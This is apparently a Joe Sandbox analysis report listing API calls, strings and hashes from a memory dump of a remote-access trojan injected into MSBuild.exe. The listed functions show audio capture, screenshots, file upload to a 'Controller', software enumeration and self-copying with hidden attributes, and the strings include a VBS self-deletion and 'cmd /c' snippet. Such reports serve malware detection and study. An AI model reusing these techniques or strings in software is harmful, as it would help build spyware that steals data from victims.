                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                          • API String ID: 738084811-2094122233
                                          • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                          • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                          • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                          • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Write$Create
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 1602526932-4212202414
                                          • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                          • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                          • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                          • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                          • API String ID: 1646373207-89630625
                                          • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                          • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                          • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                          • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040CE07
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                          • _wcslen.LIBCMT ref: 0040CEE6
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040CF84
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                          • _wcslen.LIBCMT ref: 0040CFC6
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                          • ExitProcess.KERNEL32 ref: 0040D062
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open
                                          • API String ID: 1579085052-2041965819
                                          • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                          • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                          • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                          • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 0041C036
                                          • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                          • lstrlenW.KERNEL32(?), ref: 0041C067
                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                          • _wcslen.LIBCMT ref: 0041C13B
                                          • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                          • GetLastError.KERNEL32 ref: 0041C173
                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                          • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                          • GetLastError.KERNEL32 ref: 0041C1D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                          • String ID: ?
                                          • API String ID: 3941738427-1684325040
                                          • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                          • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                          • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                          • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                          • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                          • API String ID: 2490988753-1941338355
                                          • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                          • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                          • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                          • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable$_wcschr
                                          • String ID:
                                          • API String ID: 3899193279-0
                                          • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                          • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                          • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                          • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                            • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                          • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                          • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                          • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                          • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                          • Sleep.KERNEL32(00000064), ref: 00412E94
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                          • String ID: /stext "$0TG$0TG$NG$NG
                                          • API String ID: 1223786279-2576077980
                                          • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                          • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                          • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                          • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                          • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                          • API String ID: 1332880857-3714951968
                                          • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                          • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                          • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                          • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                          • GetCursorPos.USER32(?), ref: 0041D5E9
                                          • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                          • ExitProcess.KERNEL32 ref: 0041D665
                                          • CreatePopupMenu.USER32 ref: 0041D66B
                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                          • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                          • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                          • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                          • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                          • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                                          • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                          • __aulldiv.LIBCMT ref: 00408D4D
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                          • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                          • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                          • API String ID: 3086580692-2582957567
                                          • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                          • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                          • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                          • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                          APIs
                                          • Sleep.KERNEL32(00001388), ref: 0040A740
                                            • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                            • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                            • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                            • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                          • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                          • API String ID: 3795512280-1152054767
                                          • Opcode ID: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                          • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                          • Opcode Fuzzy Hash: b31c50cb41c594cd8e106afa8ace3062c512e2322da02270ac33e7625d16e47b
                                          • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                          APIs
                                          • connect.WS2_32(?,?,?), ref: 004048E0
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                          • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                          • API String ID: 994465650-3229884001
                                          • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                          • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                          • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                          • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0045130A
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                          • _free.LIBCMT ref: 004512FF
                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                          • _free.LIBCMT ref: 00451321
                                          • _free.LIBCMT ref: 00451336
                                          • _free.LIBCMT ref: 00451341
                                          • _free.LIBCMT ref: 00451363
                                          • _free.LIBCMT ref: 00451376
                                          • _free.LIBCMT ref: 00451384
                                          • _free.LIBCMT ref: 0045138F
                                          • _free.LIBCMT ref: 004513C7
                                          • _free.LIBCMT ref: 004513CE
                                          • _free.LIBCMT ref: 004513EB
                                          • _free.LIBCMT ref: 00451403
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00419FB9
                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                          • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                          • GetLocalTime.KERNEL32(?), ref: 0041A105
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                          • API String ID: 489098229-1431523004
                                          • Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                          • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                          • Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
                                          • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                          APIs
                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                            • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                            • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                            • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                          • ExitProcess.KERNEL32 ref: 0040D9C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                          • API String ID: 1913171305-3159800282
                                          • Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                          • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                          • Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
                                          • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                          APIs
                                          Memory Dump Source
